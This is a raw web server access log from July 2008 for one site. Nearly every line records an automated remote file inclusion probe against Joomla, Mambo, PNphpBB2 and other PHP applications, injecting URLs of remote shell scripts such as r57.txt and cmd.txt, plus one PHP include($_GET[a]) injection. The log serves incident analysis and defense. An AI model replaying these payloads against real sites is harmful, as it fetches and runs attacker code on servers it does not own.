194.85.89.114 - - [29/Jul/2008:10:17:14 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://legalref.ru/config/idfx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
194.85.89.114 - - [29/Jul/2008:10:17:15 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://legalref.ru/config/idfx.txt??? HTTP/1.1" 200 3694 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
88.214.192.29 - - [29/Jul/2008:10:17:23 -0700] "GET /logs/access_071219.log//components/errors.php?error=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.85.89.114 - - [29/Jul/2008:10:17:27 -0700] "GET /logs/access.log/index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://legalref.ru/config/idfx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
87.106.191.163 - - [29/Jul/2008:10:17:40 -0700] "GET /logs/access_080315.log/lostpasswd.php?env[include_prefix]=http://susanita.de/tests/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.17.183 - - [29/Jul/2008:10:17:44 -0700] "GET /presto/?M=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.14.221.111 - - [29/Jul/2008:10:17:48 -0700] "GET /logs/access.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://neu_2.lasrv-1.de/web/%20/.../ident.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.14.221.111 - - [29/Jul/2008:10:17:48 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://neu_2.lasrv-1.de/web/%20/.../ident.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.14.221.111 - - [29/Jul/2008:10:17:49 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://neu_2.lasrv-1.de/web/%20/.../ident.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.191.163 - - [29/Jul/2008:10:17:50 -0700] "GET /logs/access_080315.log/lostpasswd.php?env[include_prefix]=http://susanita.de/tests/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.92.23.89 - - [29/Jul/2008:10:18:05 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.fieldpaoli.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.163 - - [29/Jul/2008:10:18:11 -0700] "GET /logs/access_080315.log//common/db.php?commonpath=http://susanita.de/tests/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.163 - - [29/Jul/2008:10:18:12 -0700] "GET /logs//common/db.php?commonpath=http://susanita.de/tests/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:10:18:13 -0700] "GET /logs/access_080315.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:10:18:13 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:10:18:14 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.163 - - [29/Jul/2008:10:18:22 -0700] "GET /logs/access_080315.log/errors.php?error=http://susanita.de/tests/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.163 - - [29/Jul/2008:10:18:22 -0700] "GET /logs/errors.php?error=http://susanita.de/tests/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:10:18:29 -0700] "GET /logs/access_080315.log/index.php?x=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:10:18:30 -0700] "GET /logs/access.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:10:18:30 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:10:18:31 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.85.89.114 - - [29/Jul/2008:10:18:34 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://legalref.ru/config/idfx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:10:18:35 -0700] "GET /logs/access_080218.log/?sourcedir=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.213.245.1 - - [29/Jul/2008:10:18:47 -0700] "GET /logs/access_080315.log//common/db.php?commonpath=http://inside-asia.com//templates/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.1 - - [29/Jul/2008:10:18:48 -0700] "GET //common/db.php?commonpath=http://inside-asia.com//templates/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.1 - - [29/Jul/2008:10:18:48 -0700] "GET /logs//common/db.php?commonpath=http://inside-asia.com//templates/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:10:19:00 -0700] "GET /logs/access_080117.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:10:19:00 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:10:19:00 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:10:19:23 -0700] "GET /logs/access_080215.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.251.162.130 - - [29/Jul/2008:10:19:27 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.251.162.130 - - [29/Jul/2008:10:19:28 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.64.53 - - [29/Jul/2008:10:19:30 -0700] "GET /logs/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.thecornerstone.net/calendar/languages/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.64.53 - - [29/Jul/2008:10:19:33 -0700] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.thecornerstone.net/calendar/languages/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:10:20:03 -0700] "GET /logs/access_080207.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.97.0.11 - - [29/Jul/2008:10:20:37 -0700] "GET /errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:10:21:23 -0700] "GET /logs/access_080117.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:10:21:23 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:10:21:23 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.45.177.194 - - [29/Jul/2008:10:21:35 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://artworkmarket.com/administrator/components/safe.txt? HTTP/1.1" 200 3694 "-" "libwww-perl/5.812" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:10:21:36 -0700] "GET /logs/access_080215.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.42.160.22 - - [29/Jul/2008:10:21:49 -0700] "GET /logs/access_080207.log//components/errors.php?error=http://www.thosefunnypictures.com/scripts/echo.txt????? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
195.42.160.22 - - [29/Jul/2008:10:21:49 -0700] "GET //components/errors.php?error=http://www.thosefunnypictures.com/scripts/echo.txt????? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
195.42.160.22 - - [29/Jul/2008:10:21:49 -0700] "GET /logs//components/errors.php?error=http://www.thosefunnypictures.com/scripts/echo.txt????? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:10:22:32 -0700] "GET /logs/access_080117.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.179.114 - - [29/Jul/2008:10:22:33 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.mazcotaz.com/help/sql.txt? HTTP/1.1" 200 18413 "-" "libwww-perl/5.813" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:10:22:33 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:10:22:33 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.94.30.30 - - [29/Jul/2008:10:22:40 -0700] "GET /logs/access.log/order.php?wp=http://www.myluxaeterna.co.uk/id???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.94.30.30 - - [29/Jul/2008:10:22:40 -0700] "GET /logs/order.php?wp=http://www.myluxaeterna.co.uk/id???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.94.30.30 - - [29/Jul/2008:10:22:40 -0700] "GET /order.php?wp=http://www.myluxaeterna.co.uk/id???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.150.247.23 - - [29/Jul/2008:10:22:58 -0700] "GET /errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
194.79.75.195 - - [29/Jul/2008:10:23:12 -0700] "GET /logs//app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://www.g8articles.com/update???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.79.75.195 - - [29/Jul/2008:10:23:12 -0700] "GET /logs//app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://www.g8articles.com/update???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.79.75.195 - - [29/Jul/2008:10:23:13 -0700] "GET //app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://www.g8articles.com/update???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.79.75.195 - - [29/Jul/2008:10:23:13 -0700] "GET //app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://www.g8articles.com/update???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.42.160.22 - - [29/Jul/2008:10:23:14 -0700] "GET /logs/access_071219.log//components/errors.php?error=http://www.thosefunnypictures.com/scripts/echo.txt????? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
64.32.28.161 - - [29/Jul/2008:10:23:22 -0700] "GET /logs/access.log%20//index2.php?DOCUMENT_ROOT=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
160.99.12.231 - - [29/Jul/2008:10:23:41 -0700] "GET /logs/access_080315.log//common/db.php?commonpath=http://genthal.com/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
160.99.12.231 - - [29/Jul/2008:10:23:41 -0700] "GET /logs//common/db.php?commonpath=http://genthal.com/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.97.0.11 - - [29/Jul/2008:10:23:49 -0700] "GET /logs/access_071225.log/errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.97.0.11 - - [29/Jul/2008:10:23:49 -0700] "GET /logs/errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.251.162.130 - - [29/Jul/2008:10:24:06 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.251.162.130 - - [29/Jul/2008:10:24:07 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.152.41.170 - - [29/Jul/2008:10:24:16 -0700] "GET /logs/access_080315.log/components/com_performs/performs.php?mosConfig_absolute_path=http://shopsb.ru/THIEF/kiss/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.152.41.170 - - [29/Jul/2008:10:24:16 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://shopsb.ru/THIEF/kiss/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.210.115.114 - - [29/Jul/2008:10:24:17 -0700] "GET /dudulhttp://www.brazebo.it/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
207.210.115.114 - - [29/Jul/2008:10:24:17 -0700] "GET /logs/dudulhttp://www.brazebo.it/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
207.210.115.114 - - [29/Jul/2008:10:24:17 -0700] "GET /logs/access.log/dudulhttp://www.brazebo.it/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
75.125.143.162 - - [29/Jul/2008:10:24:19 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.125.143.162 - - [29/Jul/2008:10:24:19 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.152.41.170 - - [29/Jul/2008:10:24:28 -0700] "GET /logs/access_080313.log/components/com_performs/performs.php?mosConfig_absolute_path=http://shopsb.ru/THIEF/kiss/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.177.42.133 - - [29/Jul/2008:10:25:11 -0700] "GET /logs/access_080207.log//?path%5Bdocroot%5D=http://www.ustaska.pl/editor/idid.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.177.42.133 - - [29/Jul/2008:10:25:12 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.ustaska.pl/editor/idid.txt?%0D?? HTTP/1.1" 200 58286 "-" "libwww-perl/5.79" "www.dmulk.com"
203.177.42.133 - - [29/Jul/2008:10:25:14 -0700] "GET //?path%5Bdocroot%5D=http://www.ustaska.pl/editor/idid.txt?%0D?? HTTP/1.1" 200 18423 "-" "libwww-perl/5.79" "www.dmulk.com"
80.93.56.169 - - [29/Jul/2008:10:25:23 -0700] "GET /logs/access_080329.log/lostpasswd.php?env[include_prefix]=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.93.56.169 - - [29/Jul/2008:10:25:23 -0700] "GET /lostpasswd.php?env[include_prefix]=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.93.56.169 - - [29/Jul/2008:10:25:24 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
190.196.2.205 - - [29/Jul/2008:10:25:51 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.196.2.205 - - [29/Jul/2008:10:25:53 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.160.176.60 - - [29/Jul/2008:10:25:57 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.fieldpaoli.com/images/id.txt? HTTP/1.1" 200 18417 "-" "libwww-perl/5.805" "www.dmulk.com"
203.177.42.133 - - [29/Jul/2008:10:26:07 -0700] "GET /logs/access_080315.log//?path%5Bdocroot%5D=http://www.ustaska.pl/editor/idid.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.160.176.60 - - [29/Jul/2008:10:26:17 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.fieldpaoli.com/images/id.txt? HTTP/1.1" 200 18417 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.163 - - [29/Jul/2008:10:26:35 -0700] "GET /logs/access_080326.log/errors.php?error=http://susanita.de/tests/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.210.115.114 - - [29/Jul/2008:10:26:53 -0700] "GET /dudulhttp://www.brazebo.it/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:10:26:54 -0700] "GET /logs/access_080507.log/phphtml.php?htmlclass_path=http://www.freewebtown.com/cupu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:10:26:54 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.freewebtown.com/cupu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.210.115.114 - - [29/Jul/2008:10:27:00 -0700] "GET /logs/access.log/dudulhttp://www.brazebo.it/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
207.210.115.114 - - [29/Jul/2008:10:27:00 -0700] "GET /logs/dudulhttp://www.brazebo.it/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:10:27:03 -0700] "GET /logs/errors.php?error=http://www.dpfbrasil.net63.net/i.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:10:27:03 -0700] "GET /errors.php?error=http://www.dpfbrasil.net63.net/i.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
87.106.191.163 - - [29/Jul/2008:10:27:17 -0700] "GET /logs/access_080326.log//common/db.php?commonpath=http://susanita.de/tests/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.14.123.10 - - [29/Jul/2008:10:27:29 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 200 3694 "-" "libwww-perl/5.65" "www.dmulk.com"
87.244.11.20 - - [29/Jul/2008:10:27:42 -0700] "GET /logs/access.log%20//index2.php?DOCUMENT_ROOT=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
160.99.12.231 - - [29/Jul/2008:10:27:42 -0700] "GET /logs/access_080315.log/lostpasswd.php?env[include_prefix]=http://genthal.com/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.199.200.75 - - [29/Jul/2008:10:28:05 -0700] "GET /solpot.html?body=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.199.200.75 - - [29/Jul/2008:10:28:05 -0700] "GET /logs/access_080222.log/solpot.html?body=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.199.200.75 - - [29/Jul/2008:10:28:05 -0700] "GET /logs/solpot.html?body=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.199.200.75 - - [29/Jul/2008:10:28:10 -0700] "GET /logs/access_080321.log/solpot.html?body=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.199.200.75 - - [29/Jul/2008:10:28:11 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.199.200.75 - - [29/Jul/2008:10:28:11 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.199.200.75 - - [29/Jul/2008:10:28:11 -0700] "GET /logs/access_080329.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
160.99.12.231 - - [29/Jul/2008:10:28:12 -0700] "GET /logs/access_080315.log/errors.php?error=http://genthal.com/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
160.99.12.231 - - [29/Jul/2008:10:28:12 -0700] "GET /logs/errors.php?error=http://genthal.com/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.97.0.11 - - [29/Jul/2008:10:28:30 -0700] "GET /errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.186.15.66 - - [29/Jul/2008:10:28:49 -0700] "GET /index2.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.almeranissan.ru/administrator/components/com_autobb/mambo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
91.186.15.66 - - [29/Jul/2008:10:28:49 -0700] "GET /logs/index2.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.almeranissan.ru/administrator/components/com_autobb/mambo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:10:29:14 -0700] "GET /logs/access_080528.log/trans.php?trans=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:10:29:14 -0700] "GET /trans.php?trans=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:10:29:14 -0700] "GET /logs/trans.php?trans=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:10:29:26 -0700] "GET /logs/access_080117.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
